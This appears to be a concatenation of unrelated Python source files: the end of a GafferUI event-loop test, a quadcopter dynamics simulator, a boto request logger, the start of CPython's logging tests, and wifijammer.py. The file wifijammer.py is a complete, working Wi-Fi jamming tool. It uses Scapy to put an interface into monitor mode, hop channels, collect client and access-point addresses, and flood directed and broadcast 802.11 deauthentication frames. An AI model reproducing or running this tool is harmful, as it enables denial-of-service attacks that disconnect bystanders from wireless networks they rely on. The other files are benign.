self.assertEqual( self.__uiThreadResult, 101 )
def testExecuteOnUITheadAndDontWaitForResult( self ) :
def f() :
time.sleep( 2 )
GafferUI.EventLoop.mainEventLoop().stop()
self.__uiThreadFunctionCalled = True
self.__uiThreadCalledOnCorrectThread = QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread()
return 101
def t() :
st = time.time()
self.__uiThreadResult = GafferUI.EventLoop.executeOnUIThread( f, waitForResult=False )
self.__executeOnUIThreadDuration = time.time() - st
thread = threading.Thread( target = t )
GafferUI.EventLoop.addIdleCallback( thread.start )
GafferUI.EventLoop.mainEventLoop().start()
thread.join()
self.assertEqual( self.__uiThreadFunctionCalled, True )
self.assertEqual( self.__uiThreadCalledOnCorrectThread, True )
self.assertEqual( self.__uiThreadResult, None )
# we shouldn't be waiting for the result of ui thread, so the return should be quicker
# than the actual function called
self.assertLess( self.__executeOnUIThreadDuration, 2 )
def testExceptionsInIdleCallbacks( self ) :
self.__idle1Calls = 0
self.__idle2Calls = 0
def idle1() :
self.__idle1Calls += 1
raise RuntimeError( "I am a very naughty boy" )
def idle2() :
self.__idle2Calls += 1
return True
def stop() :
if self.__idle2Calls==4 :
GafferUI.EventLoop.mainEventLoop().stop()
return False
return True
GafferUI.EventLoop.addIdleCallback( idle1 )
GafferUI.EventLoop.addIdleCallback( idle2 )
GafferUI.EventLoop.addIdleCallback( stop )
mh = IECore.CapturingMessageHandler()
with mh :
GafferUI.EventLoop.mainEventLoop().start()
self.assertEqual( self.__idle1Calls, 1 )
self.assertGreaterEqual( self.__idle2Calls, 4 )
self.assertEqual( len( mh.messages ), 1 )
self.assertEqual( mh.messages[0].level, IECore.Msg.Level.Error )
self.assertIn( "I am a very naughty boy", mh.messages[0].message )
def testExecuteOnUITheadFromUIThread( self ) :
# if we're on the ui thread already when we call executeOnUIThread(),
# then our function should be called immediately.
self.__executed = False
def f() :
self.__executed = True
return 10
r = GafferUI.EventLoop.executeOnUIThread( f )
self.assertEqual( r, 10 )
self.assertEqual( self.__executed, True )
def testAddIdleCallbackFromIdleCallback( self ) :
self.__runOnceCalls = 0
self.__addRunOnceCalls = 0
def runOnce() :
self.__runOnceCalls += 1
return False # so we're removed immediately
def addRunOnce() :
self.__addRunOnceCalls += 1
if self.__addRunOnceCalls==2 :
GafferUI.EventLoop.mainEventLoop().stop()
return False
GafferUI.EventLoop.mainEventLoop().addIdleCallback( runOnce )
return True
GafferUI.EventLoop.addIdleCallback( runOnce )
GafferUI.EventLoop.addIdleCallback( addRunOnce )
GafferUI.EventLoop.mainEventLoop().start()
self.assertEqual( self.__runOnceCalls, 2 )
self.assertEqual( self.__addRunOnceCalls, 2 )
def setUp( self ) :
GafferUITest.TestCase.setUp( self )
self.__uiThreadFunctionCalled = False
self.__uiThreadCalledOnCorrectThread = False
self.__uiThreadResult = None
self.__executeOnUIThreadDuration = 10000
if __name__ == "__main__":
unittest.main()
|
wifijammer.py
|
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i", "--interface", help="Choose monitor mode interface. By default script will find the most powerful interface and starts monitor mode on it. Example: -i mon5")
parser.add_argument("-c", "--channel", help="Listen on and deauth only clients on the specified channel. Example: -c 6")
parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-n", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", action='store_true')
parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("-p", "--packets", help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d", "--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", action='store_true')
return parser.parse_args()
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode on '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > 11:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
err = None
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
deauth(monchannel)
if first_pass == 1:
time.sleep(1)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
global first_pass
if first_pass == 1:
return
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
#pass
#time.sleep(.5)
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if args.skip:
ignore.append(args.skip)
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt)
for i in ignore:
if i in pkt.addr1 or i in pkt.addr2:
return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
# Prevent 5GHz APs from being thrown into the mix
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11']
if ap_channel not in chans:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
|
quadcopter.py
|
import numpy as np
import math
import scipy.integrate
import time
import datetime
import threading
class Propeller():
def __init__(self, prop_dia, prop_pitch, thrust_unit='N'):
self.dia = prop_dia
self.pitch = prop_pitch
self.thrust_unit = thrust_unit
self.speed = 0 #RPM
self.thrust = 0
def set_speed(self,speed):
self.speed = speed
# From http://www.electricrcaircraftguy.com/2013/09/propeller-static-dynamic-thrust-equation.html
self.thrust = 4.392e-8 * self.speed * math.pow(self.dia,3.5)/(math.sqrt(self.pitch))
self.thrust = self.thrust*(4.23e-4 * self.speed * self.pitch)
if self.thrust_unit == 'Kg':
self.thrust = self.thrust*0.101972
class Quadcopter():
# State space representation: [x y z x_dot y_dot z_dot theta phi gamma theta_dot phi_dot gamma_dot]
# From Quadcopter Dynamics, Simulation, and Control by Andrew Gibiansky
def __init__(self,quads,gravity=9.81,b=0.0245):
self.quads = quads
self.g = gravity
self.b = b
self.thread_object = None
self.ode = scipy.integrate.ode(self.state_dot).set_integrator('vode',nsteps=500,method='bdf')
self.time = datetime.datetime.now()
for key in self.quads:
self.quads[key]['state'] = np.zeros(12)
self.quads[key]['state'][0:3] = self.quads[key]['position']
self.quads[key]['state'][6:9] = self.quads[key]['orientation']
self.quads[key]['m1'] = Propeller(self.quads[key]['prop_size'][0],self.quads[key]['prop_size'][1])
self.quads[key]['m2'] = Propeller(self.quads[key]['prop_size'][0],self.quads[key]['prop_size'][1])
self.quads[key]['m3'] = Propeller(self.quads[key]['prop_size'][0],self.quads[key]['prop_size'][1])
self.quads[key]['m4'] = Propeller(self.quads[key]['prop_size'][0],self.quads[key]['prop_size'][1])
# From Quadrotor Dynamics and Control by Randal Beard
ixx=((2*self.quads[key]['weight']*self.quads[key]['r']**2)/5)+(2*self.quads[key]['weight']*self.quads[key]['L']**2)
iyy=ixx
izz=((2*self.quads[key]['weight']*self.quads[key]['r']**2)/5)+(4*self.quads[key]['weight']*self.quads[key]['L']**2)
self.quads[key]['I'] = np.array([[ixx,0,0],[0,iyy,0],[0,0,izz]])
self.quads[key]['invI'] = np.linalg.inv(self.quads[key]['I'])
self.run = True
def rotation_matrix(self,angles):
ct = math.cos(angles[0])
cp = math.cos(angles[1])
cg = math.cos(angles[2])
st = math.sin(angles[0])
sp = math.sin(angles[1])
sg = math.sin(angles[2])
R_x = np.array([[1,0,0],[0,ct,-st],[0,st,ct]])
R_y = np.array([[cp,0,sp],[0,1,0],[-sp,0,cp]])
R_z = np.array([[cg,-sg,0],[sg,cg,0],[0,0,1]])
R = np.dot(R_z, np.dot( R_y, R_x ))
return R
def wrap_angle(self,val):
return( ( val + np.pi) % (2 * np.pi ) - np.pi )
def state_dot(self, time, state, key):
state_dot = np.zeros(12)
# The velocities(t+1 x_dots equal the t x_dots)
state_dot[0] = self.quads[key]['state'][3]
state_dot[1] = self.quads[key]['state'][4]
state_dot[2] = self.quads[key]['state'][5]
# The acceleration
x_dotdot = np.array([0,0,-self.quads[key]['weight']*self.g]) + np.dot(self.rotation_matrix(self.quads[key]['state'][6:9]),np.array([0,0,(self.quads[key]['m1'].thrust + self.quads[key]['m2'].thrust + self.quads[key]['m3'].thrust + self.quads[key]['m4'].thrust)]))/self.quads[key]['weight']
state_dot[3] = x_dotdot[0]
state_dot[4] = x_dotdot[1]
state_dot[5] = x_dotdot[2]
# The angular rates(t+1 theta_dots equal the t theta_dots)
state_dot[6] = self.quads[key]['state'][9]
state_dot[7] = self.quads[key]['state'][10]
state_dot[8] = self.quads[key]['state'][11]
# The angular accelerations
omega = self.quads[key]['state'][9:12]
tau = np.array([self.quads[key]['L']*(self.quads[key]['m1'].thrust-self.quads[key]['m3'].thrust), self.quads[key]['L']*(self.quads[key]['m2'].thrust-self.quads[key]['m4'].thrust), self.b*(self.quads[key]['m1'].thrust-self.quads[key]['m2'].thrust+self.quads[key]['m3'].thrust-self.quads[key]['m4'].thrust)])
omega_dot = np.dot(self.quads[key]['invI'], (tau - np.cross(omega, np.dot(self.quads[key]['I'],omega))))
state_dot[9] = omega_dot[0]
state_dot[10] = omega_dot[1]
state_dot[11] = omega_dot[2]
return state_dot
def update(self, dt):
for key in self.quads:
self.ode.set_initial_value(self.quads[key]['state'],0).set_f_params(key)
self.quads[key]['state'] = self.ode.integrate(self.ode.t + dt)
self.quads[key]['state'][6:9] = self.wrap_angle(self.quads[key]['state'][6:9])
self.quads[key]['state'][2] = max(0,self.quads[key]['state'][2])
def set_motor_speeds(self,quad_name,speeds):
self.quads[quad_name]['m1'].set_speed(speeds[0])
self.quads[quad_name]['m2'].set_speed(speeds[1])
self.quads[quad_name]['m3'].set_speed(speeds[2])
self.quads[quad_name]['m4'].set_speed(speeds[3])
def get_position(self,quad_name):
return self.quads[quad_name]['state'][0:3]
def get_linear_rate(self,quad_name):
return self.quads[quad_name]['state'][3:6]
def get_orientation(self,quad_name):
return self.quads[quad_name]['state'][6:9]
def get_angular_rate(self,quad_name):
return self.quads[quad_name]['state'][9:12]
def get_state(self,quad_name):
return self.quads[quad_name]['state']
def set_position(self,quad_name,position):
self.quads[quad_name]['state'][0:3] = position
def set_orientation(self,quad_name,orientation):
self.quads[quad_name]['state'][6:9] = orientation
def get_time(self):
return self.time
def thread_run(self,dt,time_scaling):
rate = time_scaling*dt
last_update = self.time
while(self.run==True):
time.sleep(0)
self.time = datetime.datetime.now()
if (self.time-last_update).total_seconds() > rate:
self.update(dt)
last_update = self.time
def start_thread(self,dt=0.002,time_scaling=1):
self.thread_object = threading.Thread(target=self.thread_run,args=(dt,time_scaling))
self.thread_object.start()
def stop_thread(self):
self.run = False
|
requestlog.py
|
import sys
from datetime import datetime
from threading import Thread
import Queue
from boto.utils import RequestHook
from boto.compat import long_type
class RequestLogger(RequestHook):
"""
This class implements a request logger that uses a single thread to
write to a log file.
"""
def __init__(self, filename='/tmp/request_log.csv'):
self.request_log_file = open(filename, 'w')
self.request_log_queue = Queue.Queue(100)
Thread(target=self._request_log_worker).start()
def handle_request_data(self, request, response, error=False):
len = 0 if error else response.getheader('Content-Length')
now = datetime.now()
time = now.strftime('%Y-%m-%d %H:%M:%S')
td = (now - request.start_time)
duration = (td.microseconds + long_type(td.seconds + td.days * 24 * 3600) * 1e6) / 1e6
# write output including timestamp, status code, response time, response size, request action
self.request_log_queue.put("'%s', '%s', '%s', '%s', '%s'\n" % (time, response.status, duration, len, request.params['Action']))
def _request_log_worker(self):
while True:
try:
item = self.request_log_queue.get(True)
self.request_log_file.write(item)
self.request_log_file.flush()
self.request_log_queue.task_done()
except:
import traceback
traceback.print_exc(file=sys.stdout)
|
test_logging.py
|
#!/usr/bin/env python
#
# Copyright 2001-2011 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2011 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import datetime
import pickle
import io
import gc
import json
import os
import queue
import re
import select
import socket
from socketserver import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.support import captured_stdout, run_with_locale, run_unittest
from test.support import TestHandler, Matcher
import textwrap
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values),
'%s vs. %s' % (actual_lines, expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn (m())
DEB.info (m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_invalid_name(self):
self.assertRaises(TypeError, logging.getLogger, any)
def test_get_level_name(self):
"""Test getLevelName returns level constant."""
# NOTE(flaper87): Bug #1517
self.assertEqual(logging.getLevelName('NOTSET'), 0)
self.assertEqual(logging.getLevelName('DEBUG'), 10)
self.assertEqual(logging.getLevelName('INFO'), 20)
self.assertEqual(logging.getLevelName('WARN'), 30)
self.assertEqual(logging.getLevelName('WARNING'), 30)
self.assertEqual(logging.getLevelName('ERROR'), 40)
self.assertEqual(logging.getLevelName('CRITICAL'), 50)
self.assertEqual(logging.getLevelName(0), 'NOTSET')
self.assertEqual(logging.getLevelName(10), 'DEBUG')
self.assertEqual(logging.getLevelName(20), 'INFO')
self.assertEqual(logging.getLevelName(30), 'WARNING')
self.assertEqual(logging.getLevelName(40), 'ERROR')
self.assertEqual(logging.getLevelName(50), 'CRITICAL')
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
